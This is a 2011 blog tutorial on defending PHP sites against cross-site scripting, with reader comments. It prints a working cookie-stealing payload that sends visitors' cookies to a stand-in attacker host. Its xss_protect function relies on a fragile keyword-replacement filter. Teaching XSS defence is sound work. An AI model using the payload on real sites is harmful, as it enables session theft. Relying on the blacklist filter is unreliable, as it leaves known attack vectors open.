How To Protect Your Site From XSS With PHP

June 8th 2011

Cross-Site Scripting (XSS) is a type of attack where a hacker attempts to inject client-side script into a webpage that other people are able to view.  The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged-in user's credentials (commonly saved in browser cookies).  With a user's credentials, a hacker could gain access to sensitive parts of your website or web application.  In this simple guide, I'll show you a few ways to protect your website from XSS with PHP.

The Basics Of An XSS Attack with Example

If you allow user input on your site or application (like comments, forums, etc), you could be the target of an XSS attack.  The hacker's goal is to submit a comment, forum post, etc with JavaScript code inside and have it executed on the web page. Since these types of user input can be displayed to other users immediately, the attack could spread pretty quickly and even without your knowledge.  For an example, we'll use comments on my website:

Let's say some hacker comes along (his name is John) and submits a comment with <script>alert('XSS!');</script> in the body of the comment.  When John refreshes the page, he sees an alert message pop up that says "XSS!".  His attack worked!

All John does in this example is annoy users; he doesn't actually steal any information.  However, since that attack went through so easily, John may be thinking of other things he could do, like stealing cookies!  In JavaScript, cookies are accessible from the document object (i.e. document.cookie).  John could easily send the cookies of every user who visits the page his comment is posted on to his own website by posting the following in the body of the comment form:

<script>document.write("<img src='http://johns-site.com/?cookies=" + encodeURIComponent(document.cookie) + "' style='display:none;' />");</script>

Why does that work? When your browser loads a webpage, it requests every image on the page.  Because the SRC attribute of this image points at John's site with the visitor's cookies appended to the URL, the browser sends those cookies to John's server as part of the image request.  If John receives cookies that are used to validate a user login, he could use those cookies to gain access to, perhaps, an administrative control panel and do even more damage! Also notice that he set the display property of that element to "none" so that users can't see the image.  John could post a valid comment about the article and execute that script without anyone knowing what he's doing!  The rule of thumb here is to NEVER TRUST USER INPUT!

How To Filter Out XSS Using PHP

PHP has a couple of different functions you can use to filter user input, namely: htmlentities() and strip_tags().

The htmlentities() function translates all applicable characters to their HTML entity counterparts.  For example, using this function < would become &lt; and > would become &gt; (i.e. <script> would become &lt;script&gt;). This function is good for escaping data that is displayed as text and will prevent some types of attack, but not all (thanks to IE6).  When using the htmlentities function, make sure the second argument is set to ENT_QUOTES so that single quotes are encoded as well as double quotes, like this:

htmlentities("<script>alert('XSS!');</script>", ENT_QUOTES);
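To make the result of that call concrete, here is a minimal sketch. The $comment and $escaped variable names are only for illustration, and the explicit "UTF-8" argument is an assumption about your page encoding.

```php
<?php
// Hypothetical comment body submitted by a user.
$comment = "<script>alert('XSS!');</script>";

// ENT_QUOTES encodes both double and single quotes.
// "UTF-8" is an assumption about the encoding your pages use.
$escaped = htmlentities($comment, ENT_QUOTES, "UTF-8");

echo $escaped, "\n";
// prints: &lt;script&gt;alert(&#039;XSS!&#039;);&lt;/script&gt;
```

The browser shows the encoded string as plain text, so the visitor sees the original comment but nothing runs.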

You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities: a hacker doesn't need to use the <script> tag in hyperlinks to get JavaScript to execute).  So what can you do? You can use PHP to search for "script" and replace it with scr<b></b>ipt.  Cutting up the word like this is meant to keep the code from executing while still displaying the same output.
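Here is a rough sketch of two cases where strip_tags() on its own leaves dangerous input untouched. The variable names and sample values are made up for illustration.

```php
<?php
// A value a user might type into a "website" field. It contains no tags,
// so strip_tags() has nothing to remove.
$website = "javascript:alert('XSS!');";
$after_strip = strip_tags($website);
var_dump($after_strip === $website); // bool(true)

// strip_tags() also keeps every attribute on the tags you choose to allow.
$bold = '<b onmouseover="alert(1)">hello</b>';
$after_allow = strip_tags($bold, '<b>');
var_dump($after_allow === $bold); // bool(true)
```

In both cases the returned string is identical to the input, which is why stripping tags should be combined with escaping.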

The XSS_PROTECT Function

Let's create a PHP function that will filter out any data that may have XSS code inside of it:

/**
* Method: xss_protect
*    Purpose: Attempts to filter out code used for cross-site scripting attacks
*    @param $data - the string of data to filter
*    @param $strip_tags - true to use PHP's strip_tags function for added security
*    @param $allowed_tags - a list of tags that are allowed in the string of data
*    @return a fully encoded, escaped and (optionally) stripped string of data
*/
function xss_protect($data, $strip_tags = false, $allowed_tags = "") { 
    if($strip_tags) {
        $data = strip_tags($data, $allowed_tags . "<b>");
    }

    if(stripos($data, "script") !== false) { 
        // str_ireplace matches "script" in any case, just like the stripos check above
        $result = str_ireplace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES)); 
    } else { 
        $result = htmlentities($data, ENT_QUOTES); 
    } 

    return $result;
}

You can send this function any type of user input and it will return the same input, but fully escaped and encoded.  This function first checks to see if the data contains the word "script" anywhere; if it doesn't, it just encodes/escapes the data and returns it.  If, however, the stripos function finds "script" somewhere, it encodes/escapes the data, replaces every occurrence of "script" with scr<b></b>ipt and then returns the modified result.

There are a couple of things to notice about this function. First, the stripos function is a way to check for a substring within a string without regard to case (i.e. it will find "script", "sCrIpT" or "SCRIPT"). Second, comparing the result of the stripos function to false with "!==", instead of "!=", is important because stripos returns the position of the match, and a match at the very start of the string is position 0, which "!=" treats as equal to false.  Using "!==" compares both the types and values while using "!=" compares just the values.  See the PHP documentation on the stripos function for more information.
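The difference between the two comparisons is easy to check with a small sketch. The sample strings are made up for illustration.

```php
<?php
// "script" starts at position 0 here, so stripos() returns int(0), not false.
$pos = stripos("SCRIPT kiddie", "script");

var_dump($pos);            // int(0)
var_dump($pos != false);   // bool(false): the loose check misses the match
var_dump($pos !== false);  // bool(true): the strict check finds it

// When there is no match at all, stripos() returns a real boolean false.
$none = stripos("hello", "script");
var_dump($none);           // bool(false)
```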

You can optionally specify whether you want the function to strip any HTML tags from the data string by setting the second parameter of the function to true.  The third parameter can then be used to specify which HTML tags are allowed in the data string (which becomes the second argument to PHP's strip_tags function).  Keep in mind that htmlentities() still runs afterwards, so any tags you allow are displayed as text rather than rendered.

Here are a couple of examples on how to use this function:

//returns fully encoded/escaped content from comment
$data = xss_protect($_POST['comment_data']); 

//outputs: &lt;scr<b></b>ipt&gt;alert(&#039;XSS!&#039;);&lt;/scr<b></b>ipt&gt;
echo xss_protect("<script>alert('XSS!');</script>"); 

//outputs: click here
echo xss_protect('<a href="javascript:alert(document.cookie);">click here</a>', true); 

Never Trust User Input

No solution is going to be perfect, but at least now you have a head start!  If you have ways of improving this function, let me and everyone else know in the comments.  Thanks for reading!


Discussion


Eric Wilson
06/10/2011
"You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities - a hacker doesn't need to use the <script> tag in hyperlinks to get JavaScript to execute). "

I am confused: a hyperlink is just another tag (<a href=""></a>) that is stripped by the strip_tags() function. I sort of see your point if you are allowing the "a" tag within the strip_tags() function, but once I have reached the point where I allow the user to enter any HTML, I would place more faith in an HTML sanitizer such as HTMLPurifier or something.
Jason T. Stiles
06/10/2011
@eric wilson - for example, if you were taking a user's input (i.e. their website URL) and placing it inside the HREF attribute of an <a> tag to output to other users, a malicious user could easily take advantage of that by entering "javascript:alert('XSS!');" into the website URL input field. In this case, the strip_tags() function wouldn't prevent the JavaScript code from executing once a user clicks on the link.
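
One way to guard against that case is to accept only URLs whose scheme is on an allow-list. The sketch below is a rough illustration, not a complete solution: safe_href() is a hypothetical helper that is not part of xss_protect, and both the "#" fallback and the "UTF-8" charset are assumptions.

```php
<?php
/**
 * Hypothetical helper: returns an escaped URL for use inside an href
 * attribute, or "#" when the scheme is anything other than http or https.
 */
function safe_href($url) {
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);

    // parse_url() gives null when there is no scheme and false on a malformed URL.
    if (!is_string($scheme) || !in_array(strtolower($scheme), array("http", "https"), true)) {
        return "#";
    }

    // Escape the URL so it cannot break out of the attribute.
    return htmlentities($url, ENT_QUOTES, "UTF-8");
}

echo '<a href="' . safe_href("javascript:alert('XSS!');") . '">website</a>', "\n";
// prints: <a href="#">website</a>

echo '<a href="' . safe_href("http://example.com/?a=1&b=2") . '">website</a>', "\n";
// prints: <a href="http://example.com/?a=1&amp;b=2">website</a>
```

Checking against a short list of accepted schemes, rather than searching for "javascript:", means unexpected schemes and relative URLs are rejected by default.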

I haven't used HTMLPurifier myself, but I've seen other people recommending it. It looks like a great library for making sure your code is XSS free. However, be aware that HTMLPurifier isn't exactly a fast running solution. Taken from their FAQs page:

"HTML Purifier isn't exactly light or speedy; this is a tradeoff for the power and security the library affords. You can combat this by reading Speeding up HTML Purifier or using the standalone version." http://htmlpurifier.org/docs

If I were the one implementing their solution, I'd be using their standalone version and speeding that up as much as I can. You definitely don't want your application hanging... Just make sure you know the ins and outs of any solution you end up using.

Thanks for pointing this out though, it definitely needed clearing up.
Lumbendil
06/10/2011
In case you haven't taken a look at it, you could use PHP's filter extension for validation/sanitization:

http://www.php.net/manual/book.filter.php
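
For readers who have not used that extension, here is a minimal sketch of validating input with filter_var(). The form values are hypothetical; in a real request they would come from $_POST.

```php
<?php
// Hypothetical form values.
$age   = "42";
$email = "not-an-email<script>";

// FILTER_VALIDATE_INT returns the integer on success and false on failure.
$valid_age = filter_var($age, FILTER_VALIDATE_INT);
var_dump($valid_age);   // int(42)

// FILTER_VALIDATE_EMAIL returns the string on success and false on failure.
$valid_email = filter_var($email, FILTER_VALIDATE_EMAIL);
var_dump($valid_email); // bool(false)

$good_email = filter_var("jane@example.com", FILTER_VALIDATE_EMAIL);
var_dump($good_email);  // string(16) "jane@example.com"
```

Validation like this rejects malformed input early, but output still needs to be escaped when it is displayed.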
Jacek Wysocki
06/13/2011
Hi Jason,

Don't reinvent the wheel, try PHPIDS, it's a really great XSS detection system. https://phpids.org/
Michael Strong
06/13/2011
There's just something about stripping tags that I don't like when validating user input.

Obviously in some specific cases it's necessary, but as a general validation function I don't think it's right to include it.

For example, if I want to type "<u>Underlined</u>" and you strip my tags, it will just show as "Underlined", which is unexpected from a user's POV. The correct output should be "&lt;u&gt;Underlined&lt;/u&gt;"

Also, I believe in some browsers alert(1); may work. Same with line breaks.

I don't see why htmlentities with ENT_QUOTES isn't enough?


This is a function I use on one of my sites to show text as the user typed it (including line-breaks).
function display_html($string, $nl2br=true) {
    $string = htmlentities($string, ENT_QUOTES, "utf-8"); // Convert special chars to HTML entities

    if ($nl2br) {
        $string = nl2br($string); // Turn line breaks into <br /> tags
    }

    // Only useful when magic quotes added slashes to the input;
    // otherwise this removes backslashes the user really typed.
    $string = stripslashes($string);
    return $string;
}

If I wanted to allow tags, I think the best method would be to create a new function to convert patterns back to HTML.
Michael Strong
06/13/2011
Just a note:

My first example and first quote was wrapped in html "u" tags. That's the point I was trying to make.
Josh Adell
06/13/2011
Trying to protect against XSS is a very difficult thing. If you want the user to be able to enter data that includes HTML and still strip out scripts, it's almost impossible to do with regex or simple string replacement. Here's a page that shows code snippets for a ton of common XSS attack vectors: http://ha.ckers.org/xss.html

If you want to allow users to enter HTML markup, the only route you can go is with HTMLPurifier http://htmlpurifier.org/ (or a similar library), which attempts to turn the user input into standards-compliant HTML before stripping out the bad. It gets pretty much every vector in the list above, but at a large performance cost.

Thanks for drawing attention to this important topic!
woof
06/14/2011
@Josh Adell - Thanks for your detailed explanation.
I used to feel safe with functions like strip_tags or htmlentities, but after your tips I'll think about it again.
Michael
10/04/2011
XSS is a very important topic. Thanks for providing a quick protect function.
For my projects, I use sessions, not cookies. Second, I always use encryption and a token key for my forms. Third, I sanitize inputs with htmlentities, etc., like you wrote in this tutorial. Nice tutorial.
melo
06/18/2012
And why are you not using htmlspecialchars? Can't it prevent XSS attacks?
Iosif
09/21/2012
You should consider using the function str_ireplace() instead of str_replace(), because "script" can be written as "SCRIPT" or "sCrIpT".
Alex
12/02/2012
If you don't intend to use HTML input in your project, here is a VERY basic and very efficient way:

You may include such a function in the main file to control all POST requests.
Alex
12/02/2012
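function deXSS() {
    foreach ($_POST as $k => $v) {
        // htmlspecialchars() returns the escaped string, so assign it back
        if (is_string($v)) {
            $_POST[$k] = htmlspecialchars($v, ENT_QUOTES);
        }
    }
    return true;
}

deXSS();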
Collins
02/19/2013
Please, where am I going to place the xss_protect function?
